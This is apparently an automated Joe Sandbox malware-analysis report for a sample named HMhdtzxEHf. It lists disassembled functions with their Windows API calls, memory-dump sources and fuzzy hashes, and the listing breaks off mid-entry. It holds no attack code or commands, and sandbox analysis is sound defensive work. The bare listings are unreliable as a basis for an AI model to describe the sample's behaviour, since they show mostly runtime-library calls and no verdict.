                                                                                            Function 00A3286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A32874
                                                                                            • _strlen.LIBCMT ref: 00A32E3F
                                                                                              • Part of subcall function 00A402BA: __EH_prolog.LIBCMT ref: 00A402BF
                                                                                              • Part of subcall function 00A41B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A3BAE9,00000000,?,?,?,00010426), ref: 00A41BA0
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A32F91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                            • String ID: CMT
                                                                                            • API String ID: 1206968400-2756464174
                                                                                            • Opcode ID: a9277711aa00be368e3d535104b4ba11175e66cf80e7bcb037c9c48e0b345240
                                                                                            • Instruction ID: 746a665997bd235c972322ab041fd536360d0586bee03fd3774d52e43ea1a265
                                                                                            • Opcode Fuzzy Hash: a9277711aa00be368e3d535104b4ba11175e66cf80e7bcb037c9c48e0b345240
                                                                                            • Instruction Fuzzy Hash: 0662F3726003448FDF19DF78C9867EA7BA1AF54300F08857EFC9A9B282DB759945CB60
                                                                                            Function 00A4F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A4F844
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00A4F910
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A4F930
                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00A4F93A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 254469556-0
                                                                                            • Opcode ID: 8b52ceb9acb2fabc1a7dd23682e3a33473893241c57f558fee0d4c5c0a51a834
                                                                                            • Instruction ID: 4e29ae1d37e84260bccc895dbe619f785d07f61ef87d657ffc615055d1af166f
                                                                                            • Opcode Fuzzy Hash: 8b52ceb9acb2fabc1a7dd23682e3a33473893241c57f558fee0d4c5c0a51a834
                                                                                            • Instruction Fuzzy Hash: 48312779D052199FDF20DFA4D989BCCBBB8AF08304F1051AAE50CAB250EB759B858F44
                                                                                            Function 00A4E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualQuery.KERNEL32(80000000,00A4E5E8,0000001C,00A4E7DD,00000000,?,?,?,?,?,?,?,00A4E5E8,00000004,00A91CEC,00A4E86D), ref: 00A4E6B4
                                                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00A4E5E8,00000004,00A91CEC,00A4E86D), ref: 00A4E6CF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoQuerySystemVirtual
                                                                                            • String ID: D
                                                                                            • API String ID: 401686933-2746444292
                                                                                            • Opcode ID: fb414d6d7d04d0dc1acd6993a3c52bfcfcd92eac36ebdf40d7077fa44f3544e7
                                                                                            • Instruction ID: 8dbe957ae30b0959922652fbeb494c3cfff3a2777c5dd4e6829c0a953d3be647
                                                                                            • Opcode Fuzzy Hash: fb414d6d7d04d0dc1acd6993a3c52bfcfcd92eac36ebdf40d7077fa44f3544e7
                                                                                            • Instruction Fuzzy Hash: 8401D476600109ABDF14DF69DC09AED7BAABFC4328F0CC220ED19D6150D734D9068680
                                                                                            Function 00A58EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A58FB5
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A58FBF
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00A58FCC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 4338143c6e98b3e3749b4cff3defaf48c5826f12ac8120be8a66141e58de61bb
                                                                                            • Instruction ID: 745609769d7f124d44f9601d0493a7aec45804988d0c0c77cb231fa96ea45d7b
                                                                                            • Opcode Fuzzy Hash: 4338143c6e98b3e3749b4cff3defaf48c5826f12ac8120be8a66141e58de61bb
                                                                                            • Instruction Fuzzy Hash: E731D8759012189BCF21DF68DD8979CBBB4BF48311F5041EAE81CA7250EB749F858F54
                                                                                            Function 00A5D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                            • Instruction ID: f024af3494d46b33da4af5ce71adea56285db12cb4ef851c3eef6885d85c9961
                                                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                            • Instruction Fuzzy Hash: DB021C71E002199FDF24CFA9C9806ADB7F1FF88315F258269D919EB384D731AA45CB90
                                                                                            Function 00A4AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A4AF35
                                                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,00A6E72C,?,?), ref: 00A4AF84
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatInfoLocaleNumber
                                                                                            • String ID:
                                                                                            • API String ID: 2169056816-0
                                                                                            • Opcode ID: 13a2a86471cb0f8a0bde2b8a4fdc7c0fce953a91079b5106516d6ce75fe51c4c
                                                                                            • Instruction ID: b53dac8a5c2318d69e563d4466cdeb732ee53c2d144c6acb721a55c2b297c1a3
                                                                                            • Opcode Fuzzy Hash: 13a2a86471cb0f8a0bde2b8a4fdc7c0fce953a91079b5106516d6ce75fe51c4c
                                                                                            • Instruction Fuzzy Hash: 61017C7A100309BEDB10DFA5EC45F9A77BCEF49711F404422FA05AB190E3B0AA16CBA5
                                                                                            Function 00A36C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00A36DDF,00000000,00000400), ref: 00A36C74
                                                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00A36C95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFormatLastMessage
                                                                                            • String ID:
                                                                                            • API String ID: 3479602957-0
                                                                                            • Opcode ID: 0e1f617392c3bf79048616beb2c95805676a62940134a5d994a6061399bde34c
                                                                                            • Instruction ID: c5f5da6036d878d3c857f4a9d0d80ca97b687996a2603286cb9942f5ca736826
                                                                                            • Opcode Fuzzy Hash: 0e1f617392c3bf79048616beb2c95805676a62940134a5d994a6061399bde34c
                                                                                            • Instruction Fuzzy Hash: 90D0C731344300BFFE114F618D06F5A7B69BF45B51F15D404B755D40E0C7B49426A629
                                                                                            Function 00A619F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A619EF,?,?,00000008,?,?,00A6168F,00000000), ref: 00A61C21
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionRaise
                                                                                            • String ID:
                                                                                            • API String ID: 3997070919-0
                                                                                            • Opcode ID: 0ffb1a67287a65bcf804e2685c16c023bd3e706b20a3762cd71a8a011dca4cf0
                                                                                            • Instruction ID: 43941b34e68261b7e01a0285f9333d9a8dc4fcd724512feaa48a18ab041513f7
                                                                                            • Opcode Fuzzy Hash: 0ffb1a67287a65bcf804e2685c16c023bd3e706b20a3762cd71a8a011dca4cf0
                                                                                            • Instruction Fuzzy Hash: FBB129316106099FD719CF28C48AB697FF0FF45365F298658E89ACF2A1D335E992CB40
                                                                                            Function 00A4F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A4F66A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FeaturePresentProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 2325560087-0
                                                                                            • Opcode ID: d69e0268460b6cc33e0aab3d1b06f77cfce8ffa7b850331a8a9c46ac95d37bd1
                                                                                            • Instruction ID: 66fd97092bb1bff6143b7d8bc0171a003469ed5b8ef34ecc748d2f6bbf21c5cc
                                                                                            • Opcode Fuzzy Hash: d69e0268460b6cc33e0aab3d1b06f77cfce8ffa7b850331a8a9c46ac95d37bd1
                                                                                            • Instruction Fuzzy Hash: 17518275A006158FEB15CF98D9817AAB7F4FB88314F25993AD411EB350E7789901CB90
                                                                                            Function 00A3B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVersionExW.KERNEL32(?), ref: 00A3B16B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Version
                                                                                            • String ID:
                                                                                            • API String ID: 1889659487-0
                                                                                            • Opcode ID: 2cd0df651ac325151b775036777fc97c8835cd17d1ad3b08b382a0d5d5aecb84
                                                                                            • Instruction ID: ef73d92f542abcb7ab09c6897023011614ab3156b63b31c610a98b60078aaee4
                                                                                            • Opcode Fuzzy Hash: 2cd0df651ac325151b775036777fc97c8835cd17d1ad3b08b382a0d5d5aecb84
                                                                                            • Instruction Fuzzy Hash: 07F030B4E102088FDB18CB58EC926D673F2F748315F114295D61993390D3B0A9C68E60
                                                                                            Function 00A340FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: gj
                                                                                            • API String ID: 0-4203073231
                                                                                            • Opcode ID: af5f055c1a3b625bcdb52983f9cc9eceabfe5083c6b628c3e6b82dfc955092d9
                                                                                            • Instruction ID: a071f0e966dde8faefb7e90ee95a8f5b57e659db57b8ac2bf14bf9a4cb3682a0
                                                                                            • Opcode Fuzzy Hash: af5f055c1a3b625bcdb52983f9cc9eceabfe5083c6b628c3e6b82dfc955092d9
                                                                                            • Instruction Fuzzy Hash: 03C14776A083418FD754CF29D88065BFBE1BFC8208F19892DE998D7311D734E945CB96
                                                                                            Function 00A4F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00A4F3A5), ref: 00A4F9DA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 9a15b8360fdd61a33e75375133bb609b21726ded6f8cf2b7413aff6acf04d09f
                                                                                            • Instruction ID: 0334564c877d2350b6d05e17ac35380631b6f9d7b64a8c8e18c4d7d5de40a498
                                                                                            • Opcode Fuzzy Hash: 9a15b8360fdd61a33e75375133bb609b21726ded6f8cf2b7413aff6acf04d09f
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Function 00A5C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 54951025-0
                                                                                            • Opcode ID: c93d8340193f4b4813fab9f3f6e1a51bb3a25fcf3748138f96cfc89a3c5c59cb
                                                                                            • Instruction ID: 6785ca2e426645d09591cb9bf98509c74a51cf094efdd53271176951db240483
                                                                                            • Opcode Fuzzy Hash: c93d8340193f4b4813fab9f3f6e1a51bb3a25fcf3748138f96cfc89a3c5c59cb
                                                                                            • Instruction Fuzzy Hash: 7AA01132202200ABAB00CFB0AE083083AA8AA02280308002AA20AC00A0EA2080A2AB00
                                                                                            Function 00A462CA Relevance: .8, Instructions: 829COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                            • Instruction ID: 2af6d32872a6741a31f4e9e2c86263b89f32d3f640a0142d3adddfe269bc06a9
                                                                                            • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                            • Instruction Fuzzy Hash: F262D7756047849FCB25CF28C5906B9BBE1AFD6304F08C96EE8DA8B346D734E945CB12
                                                                                            Function 00A477EF Relevance: .8, Instructions: 817COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                            • Instruction ID: c618b82217322043e61af9cb0d1500a376080f9f8bb9f2a5a5085da431e341cf
                                                                                            • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                            • Instruction Fuzzy Hash: 7A62D5756083858FCB15CF28C980ABDBBE1BFD5304F18896DE89A8B346D730E945CB55
                                                                                            Function 00A3F461 Relevance: .7, Instructions: 694COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
